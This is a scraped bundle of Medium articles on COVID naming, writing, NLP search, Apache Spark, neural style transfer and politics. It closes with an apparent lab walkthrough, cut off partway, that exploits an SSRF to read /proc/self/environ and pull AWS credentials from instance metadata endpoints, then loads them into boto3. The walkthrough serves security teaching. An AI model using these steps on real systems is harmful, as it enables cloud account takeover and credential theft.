Originally posted on Inc.com
https://medium.com/marketing-and-entrepreneurship/10-holiday-marketing-tips-from-larry-kim-neil-patel-and-more-ac0731e1e7a7
['Larry Kim']
2020-10-20 08:08:14.523000+00:00
['Marketing', 'Entrepreneurship', 'Business', 'Social Media', 'Marketing Tips']
Bill Maher Is Wrong, We Shouldn’t Call COVID-19 the “Chinese Virus”
Bill Maher Is Wrong, We Shouldn’t Call COVID-19 the “Chinese Virus” Chinese people have enough to deal with right now. Let’s not add our bigotry to their misery. There’s a pretty big debate raging right now in the United States— and pretty much only in the United States— over whether or not COVID-19 should be dubbed the “Chinese Virus.” To me this seemed so obviously xenophobic that I didn’t feel much need to write a rebuttal. The nomenclature was being pushed almost exclusively by conservatives with a history of bigotry, including President Trump himself. But then somehow, the nonsense started to spread. While most of the mainstream media is heeding the advice of the World Health Organization to not use the term “Chinese Virus,” liberal comedian and talk show host Bill Maher disagrees. On the April 10 episode of his TV show Real Time, Bill Maher thought it wise to film a five-minute rant about how this whole thing is China’s fault, and we should all be blaming them. Before Bill acts as a carrier to spread this xenophobic stance beyond the toxic bubble of conservative news and radio, I would like to offer my counterargument. I can’t believe this needs to be said, but here’s why we shouldn’t be calling COVID-19 the “Chinese Virus.” Real Time with Bill Maher, 10 April 2020 1. The “we always do” argument is counterfactual Bill starts his segment by giving a bunch of examples of viruses that were named after where they originated. This is an argument I’ve also seen from prominent figures on Twitter — that because Lyme disease was named after a town of 7,000 people in Connecticut, coronavirus should be tied to the 1.38 billion people of China. This argument doesn’t hold for several reasons. First of all, why all of China? The disease originated very specifically from a single wet market in Wuhan province; why not name it after that one market? The reason is simple: accuracy was never the true concern. Ebola was named after a river, not a country or an ethnicity. Zika virus was named after a forest. Nobody is blaming the river or the forest for the spread of the virus, but Bill explicitly wants to blame China, so he expands his naming convention to fit his political argument. The one case that Bill clings to where a virus was actually named after a fairly large part of the world is MERS, or Middle Eastern Respiratory Syndrome. But even here, nobody uses the full name, nobody blamed the entire Middle East for having areas where camels live in close proximity to humans (MERS is said to have originated from a camel), and the region is home to a wide variety of countries and ethnicities, making the name arguably less xenophobic. The other important counter argument to this whole “this is how we’ve always named viruses” nonsense is that, well, it’s not. SARS stands for Severe Acute Respiratory Syndrome, not South-Asian Respiratory Syndrome. Think of all the pandemics we’ve suffered in recent memory, whether mad cow disease, swine flu, bird flu, HIV, HPV, even going back to the black plague — none of these were named after where the disease originated. Naming the virus after the region where it originated is the exception, not the rule. If anything, we should be questioning why we thought MERS was acceptable. The final argument on this point is that when the virus began, nobody was calling it the “Chinese Virus.” The virus first showed up in the media as simply “the coronavirus.” That name is still used in a lot of other countries — in France it’s “coronavirus,” in Japan it’s “new-form corona” (新型コロナ). Only in countries that, for some reason or another, want to blame China is the term “Chinese Virus” used, and it was adopted well after the virus started to spread. Well after other names were already attributed and widely accepted. 2. There are reasons to criticize China. The origin of the virus isn’t one of them. Now that we’ve established that there is no historical or logical reason to call COVID-19 the “Chinese Virus,” let’s look at the core of Bill’s rant: blaming China. The only clear reason he gives to is that some people in China eat bats. There is a sliver of truth to part of this argument. It’s true that wet markets are vectors for disease. It’s true the Chinese government knew about this, and poor policy decisions made this pandemic worse. But none of that has to do with eating bats. Bill is essentially saying, “Eating bats is wrong; the whole world should eat what I find palatable, like chickens, pigs and cows.” Plenty of people around the world eat plenty of food that, if mishandled, can lead to disease. This includes the United States, where you can buy a whole host of exotic meats if you know where to look. From an epidemiological perspective, the problem isn’t what Chinese people are eating, but how those animals are being handled. The close proximity and unsanitary conditions in wet markets make it more likely for certain virus strands to jump species and mutate in ways that can ultimately be dangerous to humans. Chinese authorities knew about these risks but authorized wet markets anyway, which is a reckless and shortsighted policy that deserves criticism. Blame the authorities, not the entire country and its population. Also, stop with the “Ewww gross, how could you eat that?” argument as a way to demonize other cultures. Bill’s tirade becomes particularly misleading when he implies that Chinese culture in general is causing a bunch of viruses to emerge. It’s true SARS also originated from the same region, although there is not enough evidence to suggest it came from a wet market. Bird flu likely comes from intensive bird farming — those chickens that almost everyone eats in tremendous quantities all over the world. The bird flu epidemic started in Hong Kong, which doesn’t have wet markets, and whose culture overall is significantly different from that of the people in Wuhan province. To sum up, the coronavirus is much more complex than “China does unhealthy stuff,” and using this pandemic to air out political grievances isn’t helping anyone. 3. We’re all in this together The world’s leading health and human rights experts are adamant: We’re all in this together, and we should be much more careful in assigning blame. Chinese authorities now have to respond to their negligence both domestically — as many of their people died and their economy is in shambles — and internationally. There should be pressure on the Chinese government to take aggressive measures to ensure a coronavirus outbreak doesn’t happen again. In practice, they should implement strict measures to close wet markets and more closely control the handling and sale of animals. That being said, for the vast majority of people in China who have never even been to a wet market, the virus itself is already a heavy and tragic burden. Those people deserve our solidarity; not misguided antipathy. Anger and fear are the most natural human reactions in times of crisis, but they only serve to make things worse. I don’t expect Bill to realize how mistaken his views are — controversy brings in ratings, which bring in money. I only hope his fans will think critically, recognize that he is wrong, and denounce him for using his platform to spread misinformation and stoke antagonism. The pandemic is causing more than enough human suffering as is. Let’s not add bigotry to misery.
https://medium.com/an-injustice/bill-maher-is-wrong-we-shouldnt-call-covid-19-the-chinese-virus-5d416100c2a2
['Alex Steullet']
2020-04-15 22:28:43.211000+00:00
['Culture', 'Society', 'Coronavirus', 'China', 'Politics']
Stop Thinking You Need to Dumb Down Your Articles for Medium
Stop Thinking You Need to Dumb Down Your Articles for Medium I analyzed the top 10 popular articles for the day, and this is what I discovered. Photo by Christian Perello on Unsplash If you read Medium articles on how to succeed at writing on Medium, you likely have seen the popular advice that you need to keep your writing level around a 6th-grade reading level. The argument here is that the average American has around a 7th or 8th-grade reading level. Also, online reading is quite different than printed pages. When people read articles online, they tend to scan rather than read every word. Now, writing at a 6th-grade reading level doesn't mean your writing is meant for 6th graders. Ernest Hemingway famously wrote at a 5th-grade reading level much of the time, and his works are not taught in grammar school. However, I question the need to write at a 6th grade level for the Medium audience. For one thing, many Medium readers are also writers. Writers tend to read a lot. People who read a lot naturally read at higher levels than those who do not. Further, not every popular article on the internet is at a low reading level. The New York Times articles, for example, average a 10th-grade reading level. But what about Medium? Do we really need to be shooting for 6th-grade reading levels to get more claps and reader engagement?
https://medium.com/illumination/stop-thinking-you-need-to-dumb-down-your-articles-for-medium-dcee6eb75f10
['Jennifer Geer']
2020-10-24 18:04:01.690000+00:00
['Creativity', 'Writing Tips', 'Medium', 'Writing Advice', 'Writing']
The Application of Natural Language Processing in OpenSearch
Catch the replay of the Apsara Conference 2020 at this link! By ELK Geek, with special guest, Xie Pengjun (Chengchen), Senior Algorithm Expert of Alibaba Cloud AI Introduction: When building search engines, effect optimization issues will emerge, many of which are related to Natural Language Processing (NLP). This article interprets and analyzes these issues by combining the technical points of NLP in OpenSearch. Natural Language Processing Research on NLP aims to achieve effective communication between humans and computers through languages. It is a science that integrates linguistics, psychology, computer science, mathematics, and statistics. It involves many topics, such as analysis, extraction, understanding, conversion, and the generation of natural languages and symbolic languages. The Stages of AI Computing Intelligence: It refers to the ability to outperform humans in some areas by relying on computing power and the ability to store massive data. A representative example is “Alphago” from Google. With the strong computing power of Google TPU and the combination of algorithms, like Monte Carlo Tree Search (MCTS) and reinforcement learning, Alphago can make good decisions by processing massive information about the Go game. Thus, it can outperform humans in terms of computational ability. It refers to the ability to outperform humans in some areas by relying on computing power and the ability to store massive data. A representative example is “Alphago” from Google. With the strong computing power of Google TPU and the combination of algorithms, like Monte Carlo Tree Search (MCTS) and reinforcement learning, Alphago can make good decisions by processing massive information about the Go game. Thus, it can outperform humans in terms of computational ability. Intellisense: It refers to the ability to identify important elements from unstructured data. For example, it can analyze a query to identify information, such as people’s names, places, and institutions. It refers to the ability to identify important elements from unstructured data. For example, it can analyze a query to identify information, such as people’s names, places, and institutions. Cognitive Intelligence: Based on intellisense, cognitive intelligence can understand the meaning of elements and make some inferences. For example, in Chinese, sentences like “谢霆锋是谁的儿子” and “谁是谢霆锋的儿子” both contain the same characters, but the semantics of them are different. This is what cognitive intelligence aims to solve. Based on intellisense, cognitive intelligence can understand the meaning of elements and make some inferences. For example, in Chinese, sentences like “谢霆锋是谁的儿子” and “谁是谢霆锋的儿子” both contain the same characters, but the semantics of them are different. This is what cognitive intelligence aims to solve. Creative Intelligence: It refers to computers’ ability to create sentences that conform to common sense, semantics, and logic, based on understandings of semantics. For example, computers can automatically write novels, create music, and chat with people naturally. The research on NLP covers all of the subjects above. NLP is necessary to realize comprehensive AI. The Development Trend of NLP The breakthrough in in-depth language models will lead to the progress of important natural language technologies. NLP services on public clouds will evolve to customized services from general functions. Natural language technologies will be gradually and closely integrated with industries and scenarios to create greater value. The Capabilities of Alibaba Group’s NLP Platform From bottom to top, the capabilities of the NLP platform are divided into NLP data, NLP basic capabilities, NLP application technologies, and high-level applications. NLP data is the basis for many algorithms, including language dictionaries, substantive knowledge dictionaries, syntactic dictionaries, and sentiment analysis dictionaries. Basic NLP technologies include lexical analysis, syntactic analysis, text analysis, and in-depth models. On top of basic NLP technologies, there are vertical technologies of NLP, including Q&A and conversation technologies, anti-spam technology, and address resolution. The combination of these technologies supports many applications. Among them, OpenSearch is an application with intensive NLP capabilities. Applications and Typical NLP Technologies in OpenSearch The infrastructure of OpenSearch includes Alibaba Cloud’s basic products and exclusive search systems based on the search scenarios of Alibaba Cloud’s ecosystem, such as HA3, RTP, and Dii. The basic management platform ensures the collection, management, and training of offline data. The algorithm module is divided into two parts. One is related to query parsing, including multi-grained word segmentation (MWS), entity recognition, error correction, and rewriting. Another is related to correlation and sorting, including text correlation, prediction of Click Through Rate (CTR) and Conversion Rate (CVR), and Learning to Rank (LTR). Parts with orange backgrounds are related to NLP The goal of OpenSearch is to create all-in-one and out-of-the-box intelligent search services. Alibaba Cloud will open these algorithms to users in the form of industry templates, scenarios, and peripheral services. The Analyzing Procedure of NLP in OpenSearch A search starts with a keyword. For example, when a user searches “aj1北卡兰新款球鞋” in Chinese, the analyzing procedure works like this: Cross-Domain Word Segmentation Alibaba Cloud has provided a series of open models for cross-domain word segmentation in OpenSearch. Word Segmentation Challenges The effect of word segmentation is greatly reduced by additional unrecognized words or so-called “new words” in various fields. The costs to customize word segmentation models for new users of the process from data labeling to data training are expensive. Solution A model for forming terms can be built by combining statistical characteristics, such as mutual information, and left-skewed and right-skewed log transformations. By doing so, a domain dictionary can be quickly built based on user data. By combining word segmentation models from a source domain with dictionaries from a target domain, a tokenizer can be quickly built in a target domain based on remote supervision technology. The figure above shows the automatic cross-domain word segmentation framework. Users need to provide some corpus data from their business, and Alibaba Cloud can automatically build a customized word segmentation model. This method greatly improves efficiency and meets the needs of customers quickly. This technology offers better results compared to the open-source general models of word segmentation in various domains. Named Entity Recognition (NER) NER can recognize important elements. For example, NER can recognize and extract people’s names, places, and times in queries. Challenges and Difficulties There is a lot of research and challenges for NER in NLP. NER faces difficulties, such as boundary ambiguity, semantic ambiguity, and nesting ambiguity, especially in Chinese, due to the lack of native word separators. Solution The architecture of the NER model in OpenSearch is shown in the upper-right corner of the following figure. In OpenSearch, many users have accumulated a large number of dictionary object libraries. To make full use of these libraries, Alibaba Cloud builds a GraphNER framework that organically integrates knowledge based on the BERT model. As shown on the table in the lower-right corner, the best effect of NER can be achieved in Chinese. Spelling Correction The error correction steps of OpenSearch include mining, training, evaluation, and online prediction. The main model of spelling correction is based on the statistical translation model and the neural network translation model. Also, the model has a complete set of methods in performance, display style, and intervention. Semantic Matching The emergence of in-depth language models has greatly improved many NLP tasks, especially for semantic matching. Alibaba DAMO Academy has also proposed many innovations based on BERT and developed the exclusive StructBERT model. The main innovation of StructBERT is that in the training of in-depth language models, it adds more objective functions of words and term orders. More diverse objective functions for sentence structure prediction are also added to carry out multi-task learning. However, the universal StructBERT model cannot be provided to different customers in different domains. Alibaba Cloud needs to adapt StructBERT to different domains. Therefore, a three-stage paradigm for semantic matching has been proposed to create a semantic matching model that is used to quickly produce customized semantic models for customers. Process details are shown in the figure below: Services Based on NLP Algorithms The systematic architecture of services based on algorithms includes offline computing, online engines, and product consoles. As shown in the figure, the light blue area shows the algorithm-related features provided by NLP in OpenSearch. Users can experience and use these features directly in the console. Original Source: Gain Access to Expert View — Subscribe to DDI Intel
https://medium.com/datadriveninvestor/the-application-of-natural-language-processing-in-opensearch-7b91a899d9bb
['Alibaba Cloud']
2020-12-08 15:36:51.284000+00:00
['Algorithms', 'Big Data', 'Naturallanguageprocessing', 'Artificial Intelligence', 'Alibabacloud']
Apache Spark on Amazon EMR
By Dr Peter Smith, Principal Software Engineer, ACL. I recently had the good fortune of presenting at the Vancouver Amazon Web Services User Group. This monthly event, organized by Onica, is a great opportunity to network with like-minded people in the community, and to discuss AWS-related topics. In my presentation, I provided an introduction to the Apache Spark analytics framework, and gave a quick demo of using Amazon EMR (Elastic Map Reduce) to perform a few basic queries. Here’s a summary of what was discussed. Apache Spark — Unified Analytics Engine Apache Spark has rapidly become a mainstream solution for big data analytics. Numerous organizations take advantage of Spark — processing terabytes of data with the goal of discovering new insights they wouldn’t otherwise have. This includes processing of financial data, analyzing web click streams, and monitoring and reacting to data from IoT sensors. There are many ways to perform analytics with Spark. When Spark is used in a batch-processing environment, input data is placed into cheap storage (such as Amazon S3). At a later time, a Spark cluster reads the data, performs complex analytics (sometimes taking minutes or hours), then writes the final result to the output. In addition to this traditional batch-processing model, Spark also supports machine learning, real-time streaming analytics, and graph-based analytics. What makes Spark so powerful is the ability to divide and conquer. Multiple worker nodes are created, with the analytics computation being distributed amongst them. The following diagram illustrates a Spark cluster with four worker nodes (EC2 instances). Input data is stored in S3 files, and then partitioned and shared amongst the workers. The result of the analytic computation can later be written back to another S3 bucket. In addition to Apache Spark being a well-supported open source framework, with an active user community, AWS makes it trivial to create and manage Spark clusters as part of their EMR (Elastic Map Reduce) offering. More on that later. Spark is Different from a Relational Database Although Spark is often used to analyze tables of “rectangular” data (with rows and columns), and it also supports the familiar SQL language, it would be incorrect to refer to Spark as a relational database. In fact, there are numerous key differences between how Spark manipulates data, versus how the same task is performed in a relational database. To help understand the benefits provided by Spark, let’s discuss these differences. Programming Languages Most relational database systems support the SQL language for querying data. In addition, many of these systems also support the concept of stored procedures, allowing user-defined code to execute inside the database. Although stored procedures provide immense value, they’re written in the database’s specific programming language, and are limited to the run-time environment provided by the database. In the case of Spark, the SQL language is partially supported, but that’s only the starting point. Spark runs on a JVM (Java Virtual Machine) and therefore analytics code can be written in any JVM-based language, such as Java or Scala, providing compatibility with decades of existing code libraries. Additionally, the Python language is fully supported, allowing access to the great libraries and utilities that data scientists know and love. Scalability Relational databases can utilize multiple CPU cores, providing excellent vertical scalability. However, many of the advanced features (such as concurrency, locking, and failure recovery) are easier to support if those CPU cores are tightly coupled within a single server host. That is, all the CPUs must share the same memory space and therefore be inside the same physical host. In the case of Spark, support for distributed computation is of primary importance, allowing a Spark cluster to horizontally scale up to much larger data sets (running on 100s or 1000s of hosts). Of course, the distributed (multi-server) nature of Spark means that concurrency, locking, and failure recovery must be handled very differently than with a centralized database. Data Storage Formats Because of the tightly-coupled nature of a relational database, the server has complete control over how data is stored on disk. The operations for querying, inserting, and updating data rows are optimized to use data structures such as B-Trees and WALs. The database user (a human) likely knows nothing about how these data structures work, and will never examine the underlying data files. The complexity of the database is therefore hidden. In a Spark environment, the data formats are fully under the control of users. Data is read from disk in a generic format, such as CSV, JSON, or Parquet, and the final output is written back to disk in a similar user-selected format. Read/Write Versus Read-Only As a result of Spark allowing arbitrary user-chosen disk formats, all reading of input, and writing of output, happens in a user-directed way. Spark doesn’t have control of how data is placed on disk, and therefore isn’t able to insert new data rows, or update individual fields, as you’d often do in a relational database. Instead, Spark reads the data from the input file into main memory (as much as will fit at one time), then performs the analytic computation. Once the final result is complete, the output is fully written back to disk. The key point is that Spark is not suited for transactional operations where small in-place updates are made to existing data. Resilience In a relational database, it’s common to use a master-slave arrangement to recover from failures. The slave server functions in a passive state, simply tracking all the changes made to the master’s data. However, if the master server fails, the slave is promoted to become the new master, with very little downtime. Spark uses a very different approach — rather than having a hot-backup for each of the worker nodes, any failure results in the failed worker’s computation being repeated again from the beginning (or the latest check point). More specifically, Spark tracks the data’s lineage, so it knows how to regenerate the computation by replaying the same analytic tasks on a different server. With 1000s of worker nodes, there’s a good chance that one of them will fail and its work must be replayed. Note however, it would be significantly more expensive to have 1000 slaves nodes acting as hot-backups for the 1000 primary worker nodes! Always-On or On-Demand? Relational databases run on a 24/7 basis. As new data arrives, or existing data is updated, the server is always up-and-running, and available to receive and store the updates. If you have a large database with lots of CPU power and lots of RAM, the infrastructure costs start to add up. In a Spark environment, it’s common to collect data (in CSV or JSON format) and immediately place it into cheap storage (such as Amazon S3). If nothing else is done with the data at that point in time, there’s no need for Spark workers to be available. All you pay for is the low monthly cost of data in S3. However, when it’s time to perform some analytics (for example, at the end of the month, or the fiscal year), we fire up a large Spark cluster with lots of worker nodes. Only at that time is the data read into the cluster, and the intense computation is performed. Once the work is complete, the Spark cluster is shut down to save the infrastructure cost. A Practical Example As mentioned earlier, Apache Spark is an open source package, freely available for download. However, there’s still plenty of effort required to configure the worker nodes and install the software. Luckily for us, Amazon EMR makes this trivial, allowing creation of a Spark cluster in a matter of minutes. Starting the Cluster
https://medium.com/galvanize/apache-spark-on-amazon-emr-98f04fd346c9
['Peter Smith']
2018-12-17 17:01:00.945000+00:00
['Database', 'Software Development', 'Apache Spark', 'Big Data', 'AWS']
Weekly Pentina Prompt: It’s Artificial
The above images are not real. They are not actual people, works of art, or cats. They are not photographs. There is no copyright or attribution required to use them because a computer made them up on the spot. These images are computer generated on the fly by a form of artificial intelligence known as a Generative Adversarial Network (GAN) which has been trained by lots of actual images to create these inhuman hybrids. If you use it, you will never get the same image as I do and never the same image twice. You might even find some freak occurrences with half-missing glasses, unusually large earlobes, or eyeballs in the wrong places. Don’t believe me? Stop reading this right now and go try it. How long did you spend on there? No matter. Now that you understand robots are going to take over the internet and use it to control our weak minds, it’s time to write a story. So, head back over to thispersondoesnotexist.com and start generating some very real-looking fake images until you find one that inspires a Pentina. At least this week, the picture part of your story is easy. Your prompt is to generate an interesting face (or work of art, or cat) using this mind-boggling tool and write a 50-word story about that image. Be sure to save your image and use it as the featured photo for your Pentina. Just don’t try using an image of a horse — those still need a little work ;-).
https://medium.com/centina-pentina/weekly-pentina-prompt-its-artificial-41396da6a8cc
['J.A. Taylor']
2020-12-18 14:03:24.595000+00:00
['AI', 'Pubprompt', 'Artificial Intelligence', 'Writing Prompts', 'Prompt']
Deep Learning Applications : Neural Style Transfer
One of the most exciting application of Deep Learning is Neural Style Transfer. Through this article, we will understand Neural Style Transfer and implement our own Neural Style Transfer Algorithm using pre-trained Convnet Deep Learning Model. Let’s get started and understand what neural style transfer is!!. Neural style transfer is an optimization technique used to take two images, a content image & a style reference image (such as an artwork by a famous painter) and blend them together so the output image looks like the content image, but “painted” in the style of the style reference image. In neural style transfer terminology, there are 3 images. The image which needs to be painted is known as Content image. The style in which the content image will be drawn is Style image. And there will be one output image generated by the combination of these two content and style images and this technique used here is known as Neural Style Transfer. Neural Style Transfer allows us to generate new image like one in the below by combining content image and the style image. In other words, we can say that one image (Content image) is drawn in the style of the another image(Style image) to produce new image. Source: LinkedIn Here we generated new image in the right by combining the content of Mona Lisa image in the left and style image in the middle using Neural Style Transfer Algorithm. Transfer Learning Neural Style Transfer (NST) uses a previously trained convolutional network, and builds on top of that. The idea of using a network trained on a different task and applying it to a new task is called transfer learning. Following the original NST paper, we will use the VGG network. Specifically, we’ll use VGG-19, a 19-layer version of the VGG network. This model has already been trained on the very large ImageNet database, and thus has learned to recognize a variety of low level features (at the shallower layers) and high level features (at the deeper layers). Neural Style Transfer To see how well our algorithm is generating the output image from the content image drawn in the style of style image, We will build the Neural Style Transfer (NST) algorithm in three steps: Build the content cost function, Jcontent(C,G) Build the style cost function, Jstyle(S,G) Put it together to get total cost function J(G)=α Jcontent(C,G)+β Jstyle(S,G) where α and β are hyperparameters. Cost Function We have a content image C, given a style image S and our goal is to generate a new image G. In order to implement neural style transfer, we will define a cost function J(G ) that measures how well our algorithm is producing output image and we’ll use gradient descent to minimize J (G ) in order to get desired output. This cost function function will have two components. 1. The first component is called the content cost. This is a function of the content image and of the generated image and it measures how similar is the contents of the generated image to the content of the content image C. 2. The second component is style cost which is a function of S,G and it measures how similar is the style of the image G to the style of the image S. The overall cost function is defined as follows:- Here α and β are hyperparameters to specify the relative weighting between the content cost and the style cost. The algorithm runs as follows:- Initialize the generated image G randomly say 100*100 * 3 or 500*500 *3 or whatever dimension we want it to be. 2. Use gradient descent to minimize cost function defined above and we will update G as:- Here we are actually updating the pixel values of this image G. As we run gradient descent, we minimize the cost function J(G) slowly through the pixel value so then we get slowly an image that looks more and more like our content image rendered in the style of our style image. Computing the content cost( Jcontent(C,G)) Through this content cost function, we will determine how the generated image is similar to content image. We would like to make the “generated” image G to have similar content as the input image C. It is advised to choose a layer in the middle of the network — neither too shallow nor too deep as shallow layers tend to detect lower-level features such as edges and simple textures and deep layers tend to detect higher-level features such as more complex textures as well as object classes. We will find activation for both content image C and generated image G by setting both images one by one as the input to the pretrained VGG network, and run forward propagation. The contest cost function is defined as follows:- Here nH , nW and nC are the height, width and number of channels of the hidden layer we have chosen, and appear in a normalization term in the cost. , and are the height, width and number of channels of the hidden layer we have chosen, and appear in a normalization term in the cost. a(C) and a(G) are the 3D volumes corresponding to a hidden layer’s activations. Computing the style cost( Jstyle(S,G)) First we will know what is meant by style here. Style can be defined as the correlation between activations across different channels in the layer L activation. Before moving to calculate style cost, we need to understand one term Gram matrix. We also call it style matrix. In linear algebra, the Gram matrix G of a set of vectors (v1,…,vn) is the matrix of dot products, whose entries are Gij=np.dot(vi,vj). In other words, Gij compares how similar vi is to vj: If they are highly similar, you would expect them to have a large dot product, and thus for Gij to be large. In Neural Style Transfer (NST), you can compute the Style matrix by multiplying the “unrolled” filter matrix with its transpose. The result is a matrix of dimension (nC,nC) where nC is the number of filters (channels). The value G(gram)i,j measures how similar the activations of filter i are to the activations of filter j. Now we have understand gram matrix and got to know that the style of an image can be represented using the Gram matrix of a hidden layer’s activations . Our goal will be to minimize the distance between the Gram matrix of the “style” image S and the gram matrix of the “generated” image G. The corresponding style cost for a single layer l is defined as: G gram(S) : Gram matrix of the “style” image. : Gram matrix of the “style” image. G gram(G) : Gram matrix of the “generated” image. Remember, this cost is computed using the activations for a single particular hidden layer in the network. We get even better results by combining this representation from multiple different layers. This is in contrast to the content representation, where usually using just a single hidden layer is sufficient. Minimizing the style cost will cause the image G to follow the style of the image S. Optimizing Total Cost Function Now we have calculated both content cost function and style cost function, our goal will be to optimize total cost function using gradient descent so that the generated image created from content image but drawn in the style of the image of the style image. Implementation Now we have understand the concepts of Neural Style Transfer Algorithm. Finally, let’s put everything together to implement Neural Style Transfer using TensorFlow Deep Learning Framework and pretrained VGG-19 model. Here’s what the program is doing: Create an Interactive Session 2. Load the content image 3. Load the style image 4. Randomly initialize the image to be generated 5. Load the VGG19 model 6. Build the TensorFlow graph i) Run the content image through the VGG19 model and compute the content cost ii) Run the style image through the VGG19 model and compute the style cost iii) Compute the total cost iv) Define the optimizer and the learning rate 7. Initialize the TensorFlow graph and run it for a large number of iterations, updating the generated image at every step. Output of NST Algorithm:- In our example ,the content image C is the picture of the Louvre Museum in Paris. Content Image Following is the style image: Style Image And the output generated image produced by our NST algorithm:- Neural Style Transfer Note: For code implementation and better understanding, kindly visit my github repo. I hope this helps!! Thanks for reading. Any feedbacks/suggestions will be highly appreciated.
https://krsanu555.medium.com/deep-learning-applications-neural-style-transfer-6f5bcb9df8d0
['Kumar Sanu']
2020-11-29 18:42:36.828000+00:00
['Convolutional Network', 'Deep Learning', 'AI', 'Computer Vision', 'Neural Style Transfer']
The Left Has a Self-Righteousness Problem
But that fact is misleading — especially since the Democratic Party used to be the party of slavery. Andrew Jackson winning the popular vote in 1824 but losing the electoral vote in the House of Representatives was undoubtedly a progressive victory, as Jackson is a president with one of the worst track records on slavery and Native Americans. When Democrat Samuel Tilden defeated Republican Rutherford B. Hayes in the popular vote by more than 200,000 votes, but lost in the Electoral College, the Democrats came to a compromise — they would pull federal troops in the South and end Reconstruction, but the more progressive Republicans would hold the executive branch. While that sounds like a terrible compromise, think about what might have happened had Tilden won or had Jackson won. It’s tough to think about hypotheticals, but would the country have been a better place if Democrats won in the 19th century? If you get rid of the Electoral College, it requires a constitutional amendment. It requires a two-thirds vote in the Senate, and a two-thirds vote in the House. It requires three-fourths vote of the states. If Trump won 26 out of 50 states, there is no chance Republicans will be on board to overturn an electoral system that favors them any time in the near future. And changing the Electoral College to a popular vote is like changing the sport you’re playing — why would any candidate campaign in rural Ohio or Michigan if the popular vote was all that mattered? If a political candidate wanted to be strategic with their time, why wouldn’t they campaign in New York, Los Angeles, Chicago, Boston, and San Francisco all the time? According to Jacob Levy, a professor at McGill University: “The game will not be any longer to be a [politician who is] liberal but be able to appeal to a rural Ohioan…The game will be: Be a liberal — to the extent I can maximize votes in major urban centers.” Of course, deceptive branding isn’t the answer either. As the Democratic Party grapples with its identity, the dreaded word of compromise is reality — and ideological purity is the dream. I would love and major police reform, universal health care, and not separating children and their parents at the borders too. But are we worried about people agreeing with our slogans, or are we worried about actually strategically passing that legislation? And the problem now is self-righteousness because it’s clear that the gap isn’t as racial as it used to be. It’s educational — liberals are simply not connecting as they used to with non-college-educated voters. The media might not have a liberal bias explicitly, but an education bias is shown to tilt liberal. The condescension has gone too far and belittling not only the white working class but the working class of all races. That is shown by the shifting tide of the 2020 election across all demographics. If the Democratic Party still wants to hold onto the claim of being the “party of the people,” then shifting towards being the party of the educated is antithetical to that dream. The answer we should seek, then is not to push center or push left, but do a deep examination of the way we brand and the way we speak. Automatically dismissing and disparaging anyone who disagrees with us makes us feel good about ourselves in our echo chambers, but it’s not winning more voters where it matters. I know a lot of people who agree with me in my city, but those aren’t the opinions that are winning votes where it matters. In the words of Lisa Lerer at the New York Times:
https://medium.com/the-apeiron-blog/the-left-has-a-self-righteousness-problem-1f520c233143
['Ryan Fan']
2020-12-29 21:07:32.199000+00:00
['Politics', 'Race', 'Nonfiction', 'Society', 'Election 2020']
Privilege escalation in the Cloud: From SSRF to Global Account Administrator
In my previous stories, I explored different techniques for exploiting Server-Side Request Forgeries (SSRF), which can lead to unauthorized access to various resources within the internal network of a Web server. In some circumstances, SSRFs can event lead to API keys or database credentials getting compromised. In this story, I wish to show you that in the context of a Cloud application, the consequences of successful attack that uses this technique are decoupled. An attacker that can effectively leverage an SSRF on the right resource could gain complete access to one’s AWS account, and the only limit of what you can do from there is bound by your imagination. Spin a couple of c5.xlarge to harvest Bitcoins? Host a malware delivery network over S3? Your choice… The DVCA Lab Environment For this experiment, I have developed the DVCA (Damn Vulnerable Cloud Application), which is available on GitHub and has been inspired by the Damn Vulnerable Web Application project. DO NOT deploy this in your environment if you haven’t hardened it by restraining security groups to your own IP and/or change the IAM Roles given in the project. At the moment of writing, it is made of a static S3-hosted website delivered over SSL by CloudFront. You can choose wether you want a serverless backend using an API Gateway and a Lambda function, an ECS Fargate backend running a Flask container or a Classic EC2 backend running this same container. For the purpose of this article, I will concentrate on the Fargate backend. The Damn Vulnerable Cloud Application architecture From the outside, it all seems fair, HTTPS is active on both the frontend and the backends, the website is static and therefore protected from classic attacks like SQL Injections or Wordpress plugin vulnerabilities… The DVCA interface The SSRF is done through a Webhook tester, like in my first story about the subject. All backends are coded in the way that they receive an URL, read it using urllib and returns the result to the frontend, which displays it in the “debugger” frame. Roles and Permissions in AWS EC2/ECS In order to assume a role and effectively gain permissions relative to AWS resources, you will need three pieces of information: An AccessKey , a SecretKey , and a SessionToken , in the case that the credentials were issued by the Security Token Service (STS). In an EC2 or ECS infrastructure, each VM/Task can have a particular set of permission; For example, if your Web application needs to upload files to an S3 Bucket, you will need to assign it the s3:PutObject permission over the bucket. This means that our Fargate containers also need to get credentials from STS in order to do their job, if it implies calling AWS resources. In a classic EC2 scenario, the credentials for a particular instance can be fetched by the EC2 instance (and only from there, since the endpoint is not public) from the Metadata URL: http://169.254.169.254/latest/meta-data/iam/security-credentials/ . Note that you can also fetch quite a lot of sensitive informations from this IP, like UserData scripts that are likely to contain API keys and other secrets. In the case of an ECS Task, the credentials can be retrieved from a different endpoint: http://169.254.170.2/v2/credentials/<SOME_UUID> . The UUID in question can be found in the environment variables of the container, more specifically the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable. Abusing the IAM Services through SSRFs Since the STS service is available through normal HTTP endpoints, we can trick the Fargate backend into making arbitrary requests to these endpoints, and the Frontend will happily display the result to us. But how could-we find the credentials UUID needed for the request? Well, in my other SSRF story, I showed that you can read a file using the file:// scheme. So assuming the backend is a Linux-based server, you can read the environment variables by pointing your request to file:///proc/self/environ . The relative URL for retrieving the credentials, including the UUID, can be found in /proc/self/environ Yay! Now, we can use this URI to retrieve credentials: Credentials retrieved from an SSRF request Using the credentials In order to use these credentials in a creative manner, I would suggest to use boto3 , the Python SDK for interacting with the AWS Api. Upon creating the boto3 client object, the constructor accepts credentials as parameters, so we can pass it those received from our SSRF: sts_client = boto3.client( 'sts', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) Now, to be sure that our credentials work and that we have effectively elevated privileges, the STS service has an AWS equivalent to the whoami command: get-caller-identity . Let’s verify: > print(sts_client.get_caller_identity()['Arn']) > arn:aws:sts::0123456789:assumed-role/DVCA-Fargate-Backend-DVCATaskRole-CLOUDFORMATION_ID/SOME_UUID Bingo! Now my laptop is considered by AWS like the Fargate backend of my application, meaning I have access to everything it has access. Reagarding S3 for example, the backend ECS Task has this set of permissions defined: - Effect: Allow Action: - s3:GetObject - s3:PutObject - s3:ListBucket Resource: '*' # Tip: Try to never wildcard 